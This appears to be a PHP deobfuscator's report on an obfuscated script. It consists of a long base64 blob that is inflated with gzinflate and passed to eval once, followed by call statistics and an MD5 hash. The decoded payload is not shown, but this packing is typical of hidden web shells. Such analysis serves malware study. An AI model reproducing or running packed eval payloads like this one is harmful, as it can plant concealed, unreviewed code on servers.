3sy7o9kXrdi6zB3pDNJ5uURo+iCOL8mrgSPIgsGx9JLmV10zQ663qiMSDcN44vKxdia8aUKt5egHYpn6XTHIw+5Oo4Uc2+XR7PH71op8IttMTc7ZqedLgPZlgsUoWLkh5E+lzmJhxyVTlLO3u/jspTqnjpexIHkM1QROuNjJXfIJd2s1PBWrFU8REP3AbT5++bibPj68GT3/B9dfCSPJRUHb5fuhcD3ElMIW3Zlnf3FusSN4TIA84UEAEz+AADRMW8wgohmKc3EBTT87oDqiOvmTMKXaqAz2QuzqyJENNWY3zjU1fBbF2HaKCAifgzYPTUsxC/HORYu9xmoG0d1hP2Vzm5ohnIybuLowx7FI+pWzEU4FbHCiVMppedSwwGmY9J5py1EKsu0N8VldbVoYnIurYQDKalsLCtLD68fUpeUu1Cpru6ioGkhbqIE4h5gIPdqU+8kVIjfZBpjb+ImMPWa02jQSIeXR5bRMpi5GH9rGQIofmFwNQVsihR2zQkZyZYHgocx+rWTFpPMYtLCQS23Cl57dL5YEm2U8sJgLg87ijNLRRkYv6VlzhbVZaLj0iLn7iy8ditLzfZLSxm4psCrCkae2QjC1HMcN5BsRjZ0qdVxf0lWuuiS2u8uy0rW1DyIM0wP/WyQVvV4Oj3Wfh+FwSVFN8ByWpiGN1harNLG61F6Hl5q/YSKLEjzbxHQ7kcFHJOW6ilp/73W6XYQBnezcBH/4HhdtjPzgr8HNmjzl+H1Nwis9R3Uzz3GkEtOrzPGyLa/V2ZQJE6oJwvhwb9pmMbM2UGPHlO7gw5zovEWunCfuujp2ptv+jCQ4MlxxyMvYA8sjTl4ggf4zh4w66Y3x0927D7dHroBBUSQ75CNvcPKSH2W+Rw3RlSSKHKvjUo9TD3BrHvBkLVFtWcK8WBhsmhwg6fQyiWWbrKLJdeo5IZiLoIGt4cNLYsI1VCvxotj4CK+ykV5469Gq9xJWLHc55r3BU+ktMyhDwbAKalCmXDFDUqVWdSYnwUCAJOBKPkBhwuHQcXaVo7UyogdrKGrQ3YIgqz2HilJVyDcfcf9hR1frXPYwIKlc+ugMLcvC6Oxf7xftWWNo7Q/eLtbtVNMw7e/h3+rINDg6p+70NVxeTBO1+Ljvn94hlMgPlZk5EO+f4TTLWQ9PKvIyORHfx/6YAYSCbKOSF2qyM5kilCpILfDClZDh/GjQp+iZ8nSvExuoevJ1XARKC3QloOUIgx3ljR69CpJJmUfZabH6swZQdp/TW+rKsgIW1GmWE92x/9bRqVZf05DccPnwdVmWWjEu/yaDc5xK8Jx39da9sfaw6KnOWYzxcVqZtlMnwD0KyZsu8ZPBxc8fpQweig21DRe4QYOgy0MH0qyCRuICgh476IkbRnE9iqYZMwaz30vWURHpblEvAL7knn/+w53fci8jRHbIoI2qLqWJV343ddKucIq4H/ADZs4LMSaeN4uBJp4BPnWul6DANS7Nalh0RylQGLpvOe0DeozDW35NzqtNsUuGI/dedI84LKyq+G0XhLG4tyduBEsoNIvXNeGNna1PbT6EKEQwsj7p82+U4gETW9l5HNdp97oZgPoSeaiQdvguLcsY48ZeTcx5kJXs+cwEMYEfuO2eXNz00SB2JRTi8NRoyJHbnCZTLsaKZGkbVL4vJ4kTYv5D5XeP8VXwdQiyEdo8qTUgJ2xhwjYETbMF8x6XYblCBVbdgvnCkP0ZuGi08uN9ezbCwUzxu7S0gYNax7lLWtypuklWinf/aH5BdRceeNjLev1jKkCQS3YiGAlFXNxuw8i5evNKv7Npu/K3RYEvu4qP7IdL1RPd/ipjqBNldU6Gc2VBHlff5eOYdMz+gOMNulq9bNGETFx1qQguCZCSbR4ID7sPKv+rgsI3ZMHHhRdgvc4bys6qEndZ/zoGxD5baf/vRHx3W5EkAr8ze9F4LSOJpyIJGkpgLF6jVtoFpiOigXTLOgN/c2CYsGs26Ox2H7CaKYm/t1iP9vsJ6YfWLPzX9yJCsbyprXc8YH6TQTXaExh4eHj4mPIrEMJxZ66YVJUyFjEqqJhLM1SwLBK7CQC12iVelDLkCd244FCoBiDQ1XBQ1pc25G0Xzd6hkkllF0crA5PND4mqCV8TH7BHhOzujx9ASiKE7nUIt7AwLrXVNE4/diFjwl6gMTvd5bUgscf2p9gPvdAR4Gvh4DrJblXYKd4IjlmyQNyeFZIHbHU12Hou3ZQSJ6w5Dd+aCeFRJsl7mLfFhJDlnhKviILqQFLPVn4vnR1BW0k52VJ7e4j3k0ZQ5MzvsxUp3j5vsSw1gt2hg+Lv3EYXnlAOTpDIK+ciYfRUJudNvyDdGRBUOrGUTjmGqLBr40KB8yv+n/+00vkNfqF7PhLgqWP/luhov+Ix1Ho+yM7aqJayUWK9pft5/hvL5MBBkB4I3O8oX+yOTA24JXM8eIp/os5kHWbKFm6nafzW/llYs88/66r70YwDrQTgo90+o+CjFOq+3JB56ufU5haZweAftFaXNx8VoH/4kaOHdg9BYX2PGGvNy6O3m4AMsj2eQ4kjvjC5Suvuih4d+ifHhfRrGgc+p7TK0ptefyrQPwidv0+s+Su1p7fan9p0z8ahyRrBSIc0D89QROWsfeFRO7nspxVeJTgyoCOfIDyhWmMpRC1MlQD0JF7X5ClzMQxQclFzir2HDDfBuM+eAK91tbQuqmJYd2uLV2uM+zgcgErK13jssvS3aC5iHViXnLRqvk8j6X/p31tM7+tOptmdCTqhvK5rwyxt4M6TNx85SunYJCTB76Lj6/vDh3K0SI8cT6e+/bdI0vHJupYcP1SvFCvuozhXxmNlgdLv+jtxfGRpT/Jnvfdp6571dMsO8CZzsJ97kedtgOm1jwKZ/OkrtNBPV5tposLaL/xQX9COZ/on7qae9vSnj17ppu6XICOp9ojSwtANjZ8Lp5adLVdp3Di3PMOCSuDbtvP1CvuRsb7KppXtIzHhJ8FE/Krvqz8MR6GA9mgPslg1Ov9l4O988OzC21wvmdxG7rxixetmbuBcm7jV3In2fo1homV5UTuSrwEmPPs/PBk70BraoO3B0dHoEnR12Usi/Okwq7EgSh2exrN7m5ieXHYfP5850Wzo0ONJIpf4njR0Fm9pf9lfw//1bXr3LudfSckVfsSvQ31ur4/R6OG4FK+x7DCFu9Mk9QrLVB0DoypKTqPa6RL1VHnC1Od68g6WqowVLLuNX6FQcfI3516GJLjroUipN5p9D+8hoe8m4MiLzA3EnexF0zCos8D7Pn+h0NIWxNSlqtUIBRdcgYTwyX3mrAamOt4SRW4A0gL1wV0447IyWoVsPfuSKMMa8IblTiqYJBeb5zfC5IdVxJsYE/cJo78dTvxN39c1kKNQSt636jqwmRe4v2CgynxSFIBBsOEuGV0YoCOIXldNoAFTCUbQNra/BRXt2swtlFWx2tCKvNUwhDaY5tN6wKa31YBOovat3drQqEYolWALjBx3XbB6qiyZewgZ13GHoWLysG7i4kMECutnL/snZ7+fHjwgWvh0mec3tQ+lDtrISU+Yf5ZjugZAX/SoSplz4GHfEKtPJJHs2E8BYUePyIWlQGv9/gpUXzjJbgQy6dB0himOM2YzIwuTpNMzJ3XG3xPW6THY6MbE6cV0wABlMFGlz8UMqA0NLrl0ZEx/gCegqNQPC8xZq06JxvY165q6wpah5OG0cv7U5a3KvkNyrSEal2LSLgOq1SNv8Vy0m7vUrvb6kawZT5LZjahWQrRzgXQSOxgpBBgJU4QsvnHkdGVR425NLSs76YuInKpNOCMLo+inktEW5GuDOWYS/Rml8AD0/DGm9mXB2WtzOUPxtTpakioEqLJEFqr4E0B3BTUvKp2T5AouEdUlQHPZ41u5pQ2DwImEICRmsjnGRlkNrE5PBwVx0gwmwOFVJ9J+ZEC5J2jdCykiHne6PKnIng2LRld+i3CHkHSKCovCnM1ICZjxOXxxukX0vGntNkoW4HfyGgrX5bpX1CaHk6LZXGfMV5A/fzpeHVPM7lodMUmh0x23Im98JMuNzHygiQKe1+UUxb+SeywMHcfJE5RgUZtmm9wkD6drlktnev9ThiF09DjUVkdN75KwvkQZg/HHcLqx7H95vN2+/Zpu936dX6p6r1seavTMR69TibwinU9aja1I1DNtWaz//8D")));

?>

Function Calls

base64_decode 1
gzinflate 1

Variables

None

Stats

MD5 551292ddc67322ac4ee7e1e26a2b99cb
Eval Count 1
Decode Time 1798 ms